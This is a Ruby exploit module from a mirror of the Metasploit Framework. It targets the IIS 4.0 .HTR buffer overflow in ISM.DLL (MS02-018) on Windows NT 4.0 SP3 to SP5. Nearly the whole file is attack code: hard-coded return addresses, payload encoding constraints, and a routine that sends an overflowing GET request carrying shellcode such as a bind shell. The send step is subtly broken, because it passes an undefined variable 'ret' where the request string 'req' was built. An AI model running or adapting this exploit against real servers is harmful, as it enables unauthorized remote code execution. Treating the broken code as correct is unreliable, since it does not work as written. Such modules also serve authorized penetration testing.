1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-12 11:52:01 +01:00
metasploit-framework/modules/exploits/windows/iis/ms02_018_htr.rb
HD Moore 9b977bee1b Fixed some authors
git-svn-id: file:///home/svn/incoming/trunk@3163 4d416f70-5f16-0410-b530-b9f4589650da
2005-12-02 01:18:51 +00:00

74 lines
2.1 KiB
Ruby

require 'msf/core'
module Msf
class Exploits::Windows::Iis::MS02_018_HTR < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'IIS 4.0 .HTR Buffer Overflow',
'Description' => %q{
This exploits a buffer overflow in the ISAPI ISM.DLL used to
process HTR scripting in IIS 4.0. This module works against
Windows NT 4 Service Packs 3, 4, and 5. The server will
continue to process requests until the payload being
executed has exited. If you've set EXITFUNC to 'seh', the
server will continue processing requests, but you will have
trouble terminating a bind shell. If you set EXITFUNC to
thread, the server will crash upon exit of the bind shell.
The payload is alpha-numerically encoded without a NOP sled
because otherwise the data gets mangled by the filters.
},
'Author' => [ 'stinko' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '3325'],
[ 'BID', '307'],
[ 'CVE', '1999-0874'],
[ 'URL', 'http://www.eeye.com/html/research/advisories/AD19990608.html'],
[ 'MIL', '26'],
[ 'MSB', 'MS02-018'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048,
'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
},
'Targets' =>
[
['Windows NT 4.0 SP3', {'Platform' => 'win', 'Rets' => [ 593, 0x77f81a4d ] }],
['Windows NT 4.0 SP4', {'Platform' => 'win', 'Rets' => [ 593, 0x77f7635d ] }],
['Windows NT 4.0 SP5', {'Platform' => 'win', 'Rets' => [ 589, 0x77f76385 ] }],
],
'DisclosureDate' => 'Apr 10 2002',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80)
], self)
end
def exploit
connect
buf = 'X' * target['Rets'][0]
buf << [ target['Rets'][1] ].pack('V')
buf << payload.encoded
req = "GET /#{buf} HTTP/1.0\r\n\r\n"
print_status(sprintf("Trying target #{target.name} with jmp eax at 0x%.8x...", target['Rets'][1]))
sock.put(ret)
handler
disconnect
end
end
end